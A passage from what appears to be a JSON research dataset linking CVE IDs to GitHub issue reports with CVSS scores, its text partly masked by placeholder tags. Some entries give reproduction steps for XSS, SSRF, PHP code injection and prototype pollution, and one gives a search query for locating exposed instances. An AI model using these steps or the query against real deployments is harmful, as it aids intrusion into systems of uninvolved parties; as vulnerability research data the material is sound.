Likewise, most advanced modes need persistence, until (with ace ake authz URLTAG asymmetric negotiation comes into play. Off my head I don't know any standard solutions that can do with neither asymmetric cryptography nor local persistence; some randomness based scheme could possibly be deployed but it'd be very ad hoc, custom and eventually not easier than the existing solutions. I think that the discussion in NUMBERTAG can serve as a starting point.",
  71704. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  71705. "severity": "MEDIUM",
  71706. "baseScore": 5.5,
  71707. "impactScore": 3.6,
  71708. "exploitabilityScore": 1.8
  71709. },
  71710. {
  71711. "CVE_ID": "CVE-2021-41097",
  71712. "Issue_Url_old": "https://github.com/aurelia/path/issues/44",
  71713. "Issue_Url_new": "https://github.com/aurelia/path/issues/44",
  71714. "Repo_new": "aurelia/path",
  71715. "Issue_Created_At": "2021-05-14T09:04:12Z",
  71716. "description": "Prototype Pollution. I'm submitting a bug report APITAG of aurelia path is vulnerable to prototype pollution. POC aurelia blog is using APITAG to parse APITAG so it is vulnerable to prototype pollution NUMBERTAG Open the following URL: URLTAG NUMBERTAG Open Devtools Console, and check the APITAG NUMBERTAG You can notice Object being polluted with the \"asdf\" property.",
  71717. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  71718. "severity": "HIGH",
  71719. "baseScore": 7.5,
  71720. "impactScore": 3.6,
  71721. "exploitabilityScore": 3.9
  71722. },
  71723. {
  71724. "CVE_ID": "CVE-2021-41128",
  71725. "Issue_Url_old": "https://github.com/beatrichartz/csv/issues/103",
  71726. "Issue_Url_new": "https://github.com/beatrichartz/csv/issues/103",
  71727. "Repo_new": "beatrichartz/csv",
  71728. "Issue_Created_At": "2021-10-06T08:33:36Z",
  71729. "description": "Encode Formulas to prevent CSV injection. If this is a feature request, why do we need it? We are using this library to generate CSVs for user generated input and transmitting them to another party. APITAG sadly requires a CSV and not a sane format like a JSON) We did a pentest on the application The pentest uncovered a CSV Injection vulnerability URLTAG , if the user generated input includes formulas like APITAG To address this, I suggest to implement encoding of APITAG as APITAG If this is a bug, steps to reproduce it Generate a CSV with a cell value of APITAG Open with Excel See value APITAG Is your input CSV RFC NUMBERTAG URLTAG compliant? Yes Are you interested in helping with a PR? Yes",
  71730. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  71731. "severity": "HIGH",
  71732. "baseScore": 8.8,
  71733. "impactScore": 5.9,
  71734. "exploitabilityScore": 2.8
  71735. },
  71736. {
  71737. "CVE_ID": "CVE-2021-41170",
  71738. "Issue_Url_old": "https://github.com/sroehrl/neoan3-template/issues/8",
  71739. "Issue_Url_new": "https://github.com/sroehrl/neoan3-template/issues/8",
  71740. "Repo_new": "sroehrl/neoan3-template",
  71741. "Issue_Created_At": "2021-10-21T23:24:03Z",
  71742. "description": "Closure injection has a vulnerability. In the template evaluation, closures are evaluated based on whether a value is callable within the current scope. In theory, one could create a multi step attack by storing particular values into the database that are known to be eventually rendered by the template engine. would the value of such a key happen to be a callable, one could execute global or local functions & methods. While it is unclear how one could use this to exploit neoan3, this constitutes a security concern.",
  71743. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71744. "severity": "CRITICAL",
  71745. "baseScore": 9.8,
  71746. "impactScore": 5.9,
  71747. "exploitabilityScore": 3.9
  71748. },
  71749. {
  71750. "CVE_ID": "CVE-2021-41189",
  71751. "Issue_Url_old": "https://github.com/DSpace/DSpace/issues/7928",
  71752. "Issue_Url_new": "https://github.com/dspace/dspace/issues/7928",
  71753. "Repo_new": "dspace/dspace",
  71754. "Issue_Created_At": "2021-09-02T14:01:40Z",
  71755. "description": "REST service returns wrong object for the APITAG group. Describe the bug The APITAG group has the APITAG collection as linked object: URLTAG URLTAG This is not true, as it's not a APITAG group. FILETAG Related work URLTAG",
  71756. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  71757. "severity": "HIGH",
  71758. "baseScore": 7.2,
  71759. "impactScore": 5.9,
  71760. "exploitabilityScore": 1.2
  71761. },
  71762. {
  71763. "CVE_ID": "CVE-2021-41195",
  71764. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46888",
  71765. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46888",
  71766. "Repo_new": "tensorflow/tensorflow",
  71767. "Issue_Created_At": "2021-02-03T16:47:27Z",
  71768. "description": "PATHTAG crashes(aborts) when segment_ids is large. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior PATHTAG crashes(aborts) when APITAG is large Describe the expected behavior expect an exception message if the input is unexpected instead of crash Standalone code to reproduce the issue ~~~python APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
  71769. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71770. "severity": "MEDIUM",
  71771. "baseScore": 5.5,
  71772. "impactScore": 3.6,
  71773. "exploitabilityScore": 1.8
  71774. },
  71775. {
  71776. "CVE_ID": "CVE-2021-41196",
  71777. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/51936",
  71778. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/51936",
  71779. "Repo_new": "tensorflow/tensorflow",
  71780. "Issue_Created_At": "2021-09-10T21:36:31Z",
  71781. "description": "APITAG crashes. System information Have I written custom code (as opposed to using a stock example script provided in APITAG yes OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: n/a APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): n/a APITAG version (if compiling from source): n/a APITAG version: n/a GPU model and memory: n/a Describe the current behavior APITAG crashes when APITAG contains APITAG , and outputs a all inf tensor when APITAG contains negative values. Describe the expected behavior Expect a ERRORTAG to be thrown if the input APITAG contains zero or negative values. Standalone code to reproduce the issue If the APITAG has APITAG : ERRORTAG Outputs: ERRORTAG If the APITAG has negative values: ERRORTAG The output is a tensor with shape = APITAG and all inf values.",
  71782. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71783. "severity": "MEDIUM",
  71784. "baseScore": 5.5,
  71785. "impactScore": 3.6,
  71786. "exploitabilityScore": 1.8
  71787. },
  71788. {
  71789. "CVE_ID": "CVE-2021-41197",
  71790. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46890",
  71791. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46890",
  71792. "Repo_new": "tensorflow/tensorflow",
  71793. "Issue_Created_At": "2021-02-03T17:44:30Z",
  71794. "description": "PATHTAG crash(abort). System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior The following APIs crash(abortion) when the given size is large tf. APITAG APITAG tf. APITAG tf. APITAG Describe the expected behavior expect exception messages if the input is not expected instead of crash Standalone code to reproduce the issue APITAG ~~~python import tensorflow as tf import numpy as np APITAG size NUMBERTAG Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~ APITAG ~~~python import tensorflow as tf import numpy as np APITAG target_height NUMBERTAG target_width NUMBERTAG Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~ ERRORTAG ~~~python import tensorflow as tf import numpy as np APITAG target_height NUMBERTAG target_width NUMBERTAG offset_height NUMBERTAG offset_width NUMBERTAG Output ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~ APITAG ~~~python import tensorflow as tf import numpy as np APITAG size NUMBERTAG APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG n NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
  71795. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71796. "severity": "MEDIUM",
  71797. "baseScore": 5.5,
  71798. "impactScore": 3.6,
  71799. "exploitabilityScore": 1.8
  71800. },
  71801. {
  71802. "CVE_ID": "CVE-2021-41197",
  71803. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/51908",
  71804. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/51908",
  71805. "Repo_new": "tensorflow/tensorflow",
  71806. "Issue_Created_At": "2021-09-09T18:05:47Z",
  71807. "description": "tf.pad crashes with large paddings. System information Have I written custom code (as opposed to using a stock example script provided in APITAG Yes OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source): N/A APITAG version (if compiling from source): N/A APITAG version: N/A GPU model and memory: N/A Describe the current behavior APITAG crashes when the argument \"paddings\" has large values. Describe the expected behavior Expect an exception to be thrown if the input paddings is unexpected. Standalone code to reproduce the issue ERRORTAG outputs: APITAG",
  71808. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71809. "severity": "MEDIUM",
  71810. "baseScore": 5.5,
  71811. "impactScore": 3.6,
  71812. "exploitabilityScore": 1.8
  71813. },
  71814. {
  71815. "CVE_ID": "CVE-2021-41198",
  71816. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46911",
  71817. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46911",
  71818. "Repo_new": "tensorflow/tensorflow",
  71819. "Issue_Created_At": "2021-02-04T04:10:44Z",
  71820. "description": "tf. APITAG crash(aborts) when n is large. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crash(aborts) when n is large Describe the expected behavior expect an exception message if the input unexpected instead of crash. Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG n NUMBERTAG Output ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
  71821. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71822. "severity": "MEDIUM",
  71823. "baseScore": 5.5,
  71824. "impactScore": 3.6,
  71825. "exploitabilityScore": 1.8
  71826. },
  71827. {
  71828. "CVE_ID": "CVE-2021-41199",
  71829. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46914",
  71830. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46914",
  71831. "Repo_new": "tensorflow/tensorflow",
  71832. "Issue_Created_At": "2021-02-04T04:45:22Z",
  71833. "description": "APITAG crashes(aborts) when size is large. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crashes(aborts) when size is large Describe the expected behavior expect an exception message if the input unexpected instead of crash. Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG data_format='channels_first', APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG new_num_elements NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
  71834. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71835. "severity": "MEDIUM",
  71836. "baseScore": 5.5,
  71837. "impactScore": 3.6,
  71838. "exploitabilityScore": 1.8
  71839. },
  71840. {
  71841. "CVE_ID": "CVE-2021-41200",
  71842. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46909",
  71843. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46909",
  71844. "Repo_new": "tensorflow/tensorflow",
  71845. "Issue_Created_At": "2021-02-04T03:59:44Z",
  71846. "description": "tf. APITAG aborts . System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crash (abort) Describe the expected behavior expect an exception message if the input unexpected instead of crash. Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Check failed NUMBERTAG APITAG NUMBERTAG s. APITAG have a one element tensor Aborted (core dumped) ~~~",
  71847. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71848. "severity": "MEDIUM",
  71849. "baseScore": 5.5,
  71850. "impactScore": 3.6,
  71851. "exploitabilityScore": 1.8
  71852. },
  71853. {
  71854. "CVE_ID": "CVE-2021-41202",
  71855. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46912",
  71856. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46912",
  71857. "Repo_new": "tensorflow/tensorflow",
  71858. "Issue_Created_At": "2021-02-04T04:39:54Z",
  71859. "description": "APITAG crashes(aborts) when num_rows contains large number. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crashes(aborts) when APITAG contains large number Describe the expected behavior expect an exception message if the input unexpected instead of crash. Standalone code to reproduce the issue ~~~python import tensorflow as tf import numpy as np APITAG APITAG ~~~ Output ~~~python NUMBERTAG APITAG F PATHTAG Check failed: size NUMBERTAG s NUMBERTAG Aborted (core dumped) ~~~",
  71860. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71861. "severity": "MEDIUM",
  71862. "baseScore": 5.5,
  71863. "impactScore": 3.6,
  71864. "exploitabilityScore": 1.8
  71865. },
  71866. {
  71867. "CVE_ID": "CVE-2021-41202",
  71868. "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/46889",
  71869. "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/46889",
  71870. "Repo_new": "tensorflow/tensorflow",
  71871. "Issue_Created_At": "2021-02-03T16:54:54Z",
  71872. "description": "tf. APITAG crash (abort) when start is large. System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: N/A APITAG installed from (source or binary): binary APITAG version (use command below NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source):N/A APITAG version (if compiling from source):N/A APITAG version:N/A GPU model and memory:N/A Describe the current behavior APITAG crash (abort) when start is large Describe the expected behavior expect no crash Standalone code to reproduce the issue ~~~python import tensorflow as tf APITAG ~~~ Output: ~~~python NUMBERTAG APITAG F PATHTAG Non OK status: APITAG status: Internal: Expected shape dimensions to be non negative, got NUMBERTAG Aborted (core dumped) ~~~",
  71873. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  71874. "severity": "MEDIUM",
  71875. "baseScore": 5.5,
  71876. "impactScore": 3.6,
  71877. "exploitabilityScore": 1.8
  71878. },
  71879. {
  71880. "CVE_ID": "CVE-2021-41239",
  71881. "Issue_Url_old": "https://github.com/nextcloud/server/issues/27122",
  71882. "Issue_Url_new": "https://github.com/nextcloud/server/issues/27122",
  71883. "Repo_new": "nextcloud/server",
  71884. "Issue_Created_At": "2021-05-26T16:08:07Z",
  71885. "description": "user_status \"last statuses\" widget leaks account names. There should be an option to globally disable the APITAG statuses\" widget. It leaks account names, which might be the desired behaviour, but might as well be not. On \"semi public\" Nextcloud instances you usually don't want to expose other users to each other, which is also why e.g. APITAG can be disabled. Currently it's only possible to disable user_status altogether. It would be nice if there was the option to keep user_status enabled but disable the APITAG statuses\" widget.",
  71886. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  71887. "severity": "MEDIUM",
  71888. "baseScore": 5.3,
  71889. "impactScore": 1.4,
  71890. "exploitabilityScore": 3.9
  71891. },
  71892. {
  71893. "CVE_ID": "CVE-2021-41329",
  71894. "Issue_Url_old": "https://github.com/datalust/seq-tickets/issues/1322",
  71895. "Issue_Url_new": "https://github.com/datalust/seq-tickets/issues/1322",
  71896. "Repo_new": "datalust/seq-tickets",
  71897. "Issue_Created_At": "2021-09-15T23:38:50Z",
  71898. "description": "Query cache collisions when queries differ only by in clause contents. Seq uses time slice caching to speed up APITAG queries and a few others, in particular, those that drive Dashboards URLTAG . Behind the scenes, cache entries are keyed based on the clauses of the query, active signals, and so on. A bug in recent Seq versions up to NUMBERTAG causes the keys generated for in clauses to collide, when all elements of the detected set are constants. For example: APITAG and ERRORTAG will generate the same cache key, and thus produce incorrect results when two cacheable queries differ only in this respect. The bug is caused by inlining of arrays of constants: instead of APITAG generating an expression that constructs an array with a constant element, the array is precomputed and inlined as a constant itself. The code that subsequently generates query cache keys does not properly account for this case. Query cache entries will not collide if: The queries do not group by time and are not executed from a dashboard, The queries run over different signals, Any other aspect of the query, including the select , where , group by , having , and order by clauses, differ in any way.",
  71899. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  71900. "severity": "MEDIUM",
  71901. "baseScore": 6.5,
  71902. "impactScore": 3.6,
  71903. "exploitabilityScore": 2.8
  71904. },
  71905. {
  71906. "CVE_ID": "CVE-2021-4133",
  71907. "Issue_Url_old": "https://github.com/keycloak/keycloak/issues/9247",
  71908. "Issue_Url_new": "https://github.com/keycloak/keycloak/issues/9247",
  71909. "Repo_new": "keycloak/keycloak",
  71910. "Issue_Created_At": "2021-12-20T12:37:38Z",
  71911. "description": "Incorrect authorization allows unpriviledged users to create other users. Describe the bug A incorrect authorization flaw was found in Keycloak NUMBERTAG the flaw allows an attacker with any existing user account to create new default user accounts via the administrative REST API even where new user registration is disabled. URLTAG Version NUMBERTAG Expected behavior _No response_ Actual behavior _No response_ How to Reproduce? _No response_ Anything else? _No response_",
  71912. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  71913. "severity": "HIGH",
  71914. "baseScore": 8.8,
  71915. "impactScore": 5.9,
  71916. "exploitabilityScore": 2.8
  71917. },
  71918. {
  71919. "CVE_ID": "CVE-2021-41402",
  71920. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/59",
  71921. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/59",
  71922. "Repo_new": "flatcore/flatcore-cms",
  71923. "Issue_Created_At": "2021-09-13T09:36:05Z",
  71924. "description": "Code execution vulnerabilities in the background. Describe the bug Code execution vulnerabilities in the background To Reproduce Steps to reproduce the behavior: APITAG in to the background NUMBERTAG Go to APITAG position APITAG info and enter the malicious php code in the Permalink parameter to jump out of the structure to execute the malicious code APITAG save PATHTAG and PATHTAG files will be inserted with malicious code APITAG the homepage and you will see that the malicious code we inserted was successfully executed and returned the result Screenshots FILETAG Click Save New Page PATHTAG and PATHTAG files will be inserted with malicious code FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: APITAG Browser All Version Last version",
  71925. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  71926. "severity": "HIGH",
  71927. "baseScore": 8.8,
  71928. "impactScore": 5.9,
  71929. "exploitabilityScore": 2.8
  71930. },
  71931. {
  71932. "CVE_ID": "CVE-2021-41403",
  71933. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/60",
  71934. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/60",
  71935. "Repo_new": "flatcore/flatcore-cms",
  71936. "Issue_Created_At": "2021-09-14T02:58:17Z",
  71937. "description": "Server side request forgery vulnerability (SSRF). Describe the bug Server side request forgery vulnerability (SSRF) To Reproduce Steps to reproduce the behavior NUMBERTAG go to APITAG NUMBERTAG Enter the intranet address in the box to request NUMBERTAG Can make a request to the intranet Screenshots FILETAG request packet FILETAG Locate the vulnerable code APITAG The start_index parameter calls the function fc_crawler FILETAG Tracing the fc_crawler function Locate the vulnerable code ERRORTAG FILETAG Continue to track the APITAG function FILETAG Led to the SSRF vulnerability Desktop (please complete the following information): OS: APITAG Browser all Version last version",
  71938. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71939. "severity": "CRITICAL",
  71940. "baseScore": 9.8,
  71941. "impactScore": 5.9,
  71942. "exploitabilityScore": 3.9
  71943. },
  71944. {
  71945. "CVE_ID": "CVE-2021-41413",
  71946. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/20",
  71947. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/20",
  71948. "Repo_new": "brackeen/ok-file-formats",
  71949. "Issue_Created_At": "2021-09-10T01:15:24Z",
  71950. "description": "bugs found in APITAG and APITAG via honggfuzz. Test code : CODETAG Tools: honggfuzz NUMBERTAG Target version: master NUMBERTAG Result: CODETAG Here are the poc CVETAG",
  71951. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  71952. "severity": "HIGH",
  71953. "baseScore": 7.8,
  71954. "impactScore": 5.9,
  71955. "exploitabilityScore": 1.8
  71956. },
  71957. {
  71958. "CVE_ID": "CVE-2021-41415",
  71959. "Issue_Url_old": "https://github.com/youranreus/Subscription-Manager/issues/2",
  71960. "Issue_Url_new": "https://github.com/youranreus/subscription-manager/issues/2",
  71961. "Repo_new": "youranreus/subscription-manager",
  71962. "Issue_Created_At": "2021-09-14T03:11:22Z",
  71963. "description": "Subscription Manager NUMBERTAG FILETAG hava a SQL Injection Vulnerability. Vulnerability file: APITAG ERRORTAG In the APITAG file, the APITAG parameter and the APITAG parameter under the APITAG method are controllable, and the APITAG parameter is not strictly filtered, causing XSS injection vulnerabilities! POC ERRORTAG FILETAG",
  71964. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71965. "severity": "MEDIUM",
  71966. "baseScore": 6.1,
  71967. "impactScore": 2.7,
  71968. "exploitabilityScore": 2.8
  71969. },
  71970. {
  71971. "CVE_ID": "CVE-2021-41418",
  71972. "Issue_Url_old": "https://github.com/Amozing/Am0zang/issues/1",
  71973. "Issue_Url_new": "https://github.com/amozing/am0zang/issues/1",
  71974. "Repo_new": "amozing/am0zang",
  71975. "Issue_Created_At": "2021-09-14T10:09:23Z",
  71976. "description": "APITAG has an unauthorized access vulnerability. APITAG for assets using Fofa:\" ariang\" && country=\"CN\" (It's OK without \u201dCN\u201c ) FILETAG APITAG You can view the download history, view APITAG status, settings and settings of APITAG FILETAG FILETAG FILETAG FILETAG FILETAG",
  71977. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71978. "severity": "CRITICAL",
  71979. "baseScore": 9.8,
  71980. "impactScore": 5.9,
  71981. "exploitabilityScore": 3.9
  71982. },
  71983. {
  71984. "CVE_ID": "CVE-2021-41432",
  71985. "Issue_Url_old": "https://github.com/flatpressblog/flatpress/issues/88",
  71986. "Issue_Url_new": "https://github.com/flatpressblog/flatpress/issues/88",
  71987. "Repo_new": "flatpressblog/flatpress",
  71988. "Issue_Created_At": "2021-09-15T18:15:56Z",
  71989. "description": "Stored XSS in the Blog Content. APITAG NUMBERTAG Stored XSS in the Blog Content A stored Cross Site Scripting (XSS) vulnerability exists in version NUMBERTAG of the APITAG application that allows for arbitrary execution of APITAG commands. Steps to reproduce the vulnerability NUMBERTAG isit the APITAG Administration area NUMBERTAG Navigate to the Entries > Write Entry NUMBERTAG Enter any Subject NUMBERTAG In the content area put the following payload: APITAG FILETAG NUMBERTAG Click the APITAG button NUMBERTAG Stored XSS payload is triggered. FILETAG Also we can verify the stored XSS payload by navigating to the home page. FILETAG Discovered by Martin Kubecka, September NUMBERTAG",
  71990. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  71991. "severity": "MEDIUM",
  71992. "baseScore": 5.4,
  71993. "impactScore": 2.7,
  71994. "exploitabilityScore": 2.3
  71995. },
  71996. {
  71997. "CVE_ID": "CVE-2021-41456",
  71998. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1911",
  71999. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1911",
  72000. "Repo_new": "gpac/gpac",
  72001. "Issue_Created_At": "2021-09-07T16:21:54Z",
  72002. "description": "Stack buffer overflow in APITAG at PATHTAG in nhmldmx_send_sample. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG",
  72003. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72004. "severity": "HIGH",
  72005. "baseScore": 7.5,
  72006. "impactScore": 3.6,
  72007. "exploitabilityScore": 3.9
  72008. },
  72009. {
  72010. "CVE_ID": "CVE-2021-41457",
  72011. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1909",
  72012. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1909",
  72013. "Repo_new": "gpac/gpac",
  72014. "Issue_Created_At": "2021-09-07T15:26:17Z",
  72015. "description": "Stack buffer overflow in APITAG at PATHTAG in nhmldmx_init_parsing. [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). Step to reproduce NUMBERTAG get latest commit code (GPAC version NUMBERTAG DEV re NUMBERTAG gd NUMBERTAG acad8 master NUMBERTAG compile with enable sanitizer NUMBERTAG make NUMBERTAG dirs which every of them has a large name(length NUMBERTAG this makes the file's abs path lengh larger than NUMBERTAG we called it APITAG NUMBERTAG run APITAG add {path to APITAG new new.mp4 Env: Ubunut NUMBERTAG clang NUMBERTAG My cmd line an ASAN report APITAG add PATHTAG new new.mp4 ASAN report: ERRORTAG Maybe fix for issue NUMBERTAG dose not consider this situation that there is a stack buffer overflow in nhmldmx_init_parsing",
  72016. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72017. "severity": "HIGH",
  72018. "baseScore": 7.5,
  72019. "impactScore": 3.6,
  72020. "exploitabilityScore": 3.9
  72021. },
  72022. {
  72023. "CVE_ID": "CVE-2021-41458",
  72024. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1910",
  72025. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1910",
  72026. "Repo_new": "gpac/gpac",
  72027. "Issue_Created_At": "2021-09-07T16:19:06Z",
  72028. "description": "SEGV on unknown address in APITAG at PATHTAG in gf_blob_get. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG ERRORTAG",
  72029. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  72030. "severity": "MEDIUM",
  72031. "baseScore": 5.5,
  72032. "impactScore": 3.6,
